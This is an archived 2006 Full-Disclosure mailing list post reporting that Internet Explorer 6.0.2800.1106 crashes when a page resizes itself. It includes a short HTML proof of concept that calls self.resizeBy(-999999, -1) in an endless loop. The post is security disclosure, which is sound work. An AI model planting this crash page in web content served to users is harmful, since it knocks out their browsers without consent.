lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri May 26 13:50:19 2006
From: kgp.143 at gmail.com (r k)
Subject: Internet Explorer Ver 6.0.2800.1106 vulnerability

Hi All,


IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.

the following is the code

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
  var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null);

  while (wwidth)
  {
 self.resizeBy(-999999, -1);
  }

</script>

</body>
</html>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

tested on windows 2000,windows XP



thank you

antar
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060526/d5c04073/attachment.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ